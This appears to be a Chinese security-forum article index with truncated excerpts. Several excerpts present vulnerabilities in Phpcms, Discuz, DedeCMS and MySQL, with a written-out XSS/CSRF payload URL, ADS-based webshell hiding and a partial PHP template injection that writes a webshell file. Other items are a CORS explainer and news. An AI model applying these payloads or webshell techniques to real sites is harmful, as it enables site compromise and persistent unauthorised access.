文章列表
【鸡肋2】Phpcms xss
最近戒烟,总是戒不掉,坚持了一个月 后来还是忍不住抽了几口结果停不住了,最多的时候有大概2个月 一天3包的样子抽到最后抽什么烟感觉都没味道了,顺便求个戒烟的法子。也是以前的存货了,不知道有木有修复message/index.phppublic function reply() { if(isset($_POST)) { $messag
【鸡肋】Dz x2.5后台命令执行
琢磨着很久没发帖,最近都没事提交一些漏洞,赚点外快,安心钱,不做黑产也有几个月没怎么接触这些东西了,从硬盘里面翻出个这么个鸡肋为什么说鸡肋了 因为必须是linux的主机,而且呢 也不能导出shell 因为他过滤了. 所以不能带后缀 但是呢 能执行一些基本的命令 而且是能看到执行结果的admin_db.php}
Win下MySQL提权时无法创建目录解决办法及数据流隐藏Webshell
这个其实是NTFS惹的祸。NTFS中的ADS(交换数据流)可以建立目录,隐藏webshell等等。0x01 Mysql创建目录当MySQL版本较高时,自定义函数的dll需要放在mysql目录下的lib\plugin\。一般普通的脚本是没有在这个文件夹下创建文件夹的权限的。这里可以用到ads来突破:select 'xxx' into outfile 'D:\\mysql\\
DEDECMS v5.7(2013-06-07) xss+csrf 0day
不知有人发过没有?有则删之,无则留之。。。书签管理存在xss+csrfhttp://localhost/dedecms/member/flink_main.phpxss:http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test' onmouseover=alert(1);'&url=test' onmouseover=alert(1);'CSRF:<img src="http://localhost/dedecms/
详解XMLHttpRequest的跨域资源共享
在Browser Security-同源策略、伪URL的域这篇文章中提到了浏览器的同源策略,其中提到了XMLHttpRequest严格遵守同源策略,非同源不可请求。但是,在实践当中,经常会出现需要跨域请求资源的情况,比较典型的例如某个子域名向负责进行用户验证的子域名请求用户信息等应用。以往,有一种解决方案是利用JS
【爱我T00ls】吐槽下现在的各种白帽子, 各种X客, 各种安全X程师
补充一下, 有人说价值观这个问题, 我只想说这个社会是残酷的, 没钱只能一辈子屌丝别说我眼里只看重钱, 赚钱为的什么? 为的是自己以后没那么幸苦没那么累, 也是为了自己以后的生活过的惬意并快乐.. 钱有多大用? 起码他能给你带来快乐, 带来物质上的享受, 你承认也好, 不承认也罢, 这都是事实我所理解的
搜狐(sohu.com)调查 (POST参数可盲注)SQL注入漏洞
搜狐(sohu.com)调查 (POST参数可盲注)SQL注入漏洞
斯诺登事件或倒逼中美网络安全合作机制
在下周即将进行的第五轮中美战略与经济对话当中,网络安全议题首当其冲。近期引发国际社会广泛关注的斯诺登事件,也料成中美对话难以绕开的话题。虽然斯诺登的爆料折射出中美网络安全之间的龃龉,也让人为中美关系捏把汗,但有分析认为,斯诺登事件反而可能倒逼出中美网络安全合作机制。经中美双方商定
俄军网罗IT人才打造专门打击网络威胁独立部队
近年来,世界各大国纷纷组建网络部队,为未来“随时打响”的网络战作准备。俄罗斯国防部长绍伊古4日表示,俄军将到地方高校网罗IT人才,为年底成立打击网络威胁的独立部队输送人才。 俄《观点报》5日以“绍伊古网罗人才”为题报道称,从5日起,俄罗斯开始为即将成立的“科技连”招募人才,首个“科
phpcms后台通杀拿shell
先是发到乌云了,结果是内容太简单 不给审核通过 罢了罢了 不发到那里了利用办法是通过模板那里界面==》模板风格==》当前使用的模板详情列表==》内容模型 content文件夹==》找到index.html点击修改在最下面{template "content","footer"}的上一行写入<?php$fp = @fopen("t.php", 'a');@fwrite($fp, '<
